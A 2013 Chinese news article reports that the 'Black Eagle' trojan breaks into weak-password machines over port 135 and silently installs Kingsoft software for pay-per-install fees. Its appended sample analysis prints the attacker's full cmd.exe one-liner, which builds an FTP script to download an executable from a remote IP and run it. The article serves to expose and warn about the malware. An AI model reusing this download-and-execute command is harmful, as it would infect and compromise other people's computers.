當(dāng)前位置：安全 → 殺毒軟件/病毒 → 正文

提防電腦病毒玩無中生有冒金山毒霸

責(zé)任編輯：editor001 |來源：企業(yè)網(wǎng)D1Net 2013-03-11 14:28:09 本文摘自：中國財(cái)經(jīng)時(shí)報(bào)網(wǎng)

近日，針對媒體披露金山獵豹瀏覽器借病毒推廣一事，金山聯(lián)盟于2月26日發(fā)布公告，承認(rèn)情況屬實(shí)并承諾嚴(yán)肅處理。然而在公告發(fā)布一周后，有網(wǎng)友發(fā)現(xiàn)金山軟件病毒推廣愈演愈烈，并對截獲的名為“黑鷹”的下載者病毒進(jìn)行了分析，證實(shí)包括金山毒霸、金山衛(wèi)士、金山瀏覽器等多款軟件借病毒推廣，金山的“嚴(yán)打”公告真實(shí)性也因此遭到嚴(yán)重質(zhì)疑。

圖1：最新發(fā)現(xiàn)的黑鷹病毒捆綁推廣金山軟件

經(jīng)安全工程師分析，黑鷹病毒主要針對存在弱密碼的計(jì)算機(jī)進(jìn)行攻擊，在進(jìn)入用戶電腦后，黑鷹病毒就會(huì)自動(dòng)下載并安裝推廣軟件，其中就包括金山毒霸，金山衛(wèi)士，獵豹瀏覽器，無極影音，6080游戲，Dushow美女視頻合集等(圖1)。在用戶電腦的直接表現(xiàn)就是，桌面上憑空出現(xiàn)多款軟件。

圖2：用戶桌面上出現(xiàn)的這些軟件系木馬自動(dòng)安裝

此前，在國內(nèi)多家媒體報(bào)道的重壓之下，金山聯(lián)盟承認(rèn)病毒推廣問題存在，但將責(zé)任推給參與推廣的聯(lián)盟會(huì)員的做法被網(wǎng)民認(rèn)為誠意不足。但目前看來，金山公告只是掩人耳目。業(yè)內(nèi)分析表示，“一個(gè)金山獵豹瀏覽器有效安裝是0.4元，金山毒霸是0.5元，酷屏是0.2元。病毒制造者也看準(zhǔn)了金山背后騰訊和百度兩大金主。”

目前，盡管金山“靜默安裝器”、“軟件捆綁靜默包URL”等推廣方式非常隱蔽，但還是被憤怒的網(wǎng)民揪了出來，有網(wǎng)友在微博上憤怒的質(zhì)問金山：“你一個(gè)殺毒廠商，和病毒木馬蛇鼠一窩算怎么回事兒，回頭就卸載了金山的所有產(chǎn)品”。

由于該木馬主要通過掃描135端口弱口令的方式尋找攻擊目標(biāo)，所以安全專家建議網(wǎng)民應(yīng)提高安全防范意識(shí)，使用卡巴斯基、360、Nod32等具備弱口令防護(hù)功能的專業(yè)安全軟件提高電腦安全防護(hù)能力。

附：“黑鷹病毒”樣本分析：

1、黑客對一個(gè)網(wǎng)段進(jìn)行135端口掃描，對存在弱口令的計(jì)算機(jī)嘗試使用wmi進(jìn)行遠(yuǎn)程登錄，一旦登錄成功，即可遠(yuǎn)程執(zhí)行指令。攻擊成功后，黑客會(huì)通過wmi啟動(dòng)一個(gè)cmd.exe，執(zhí)行如下指令，下載這個(gè)下載者木馬并執(zhí)行：

/c @echo open 198.52.101.98>>log.dat&@echo 123>>log.dat&@echo 123>>log.dat&@echo bin>>log.dat&@echo get brdrty.exe>>log.dat&@echo bye>>log.dat&@ftp -s:log.dat&del log.dat&brdrty&brdrty.exe&brdrty.exe黑客的ftp服務(wù)器如下：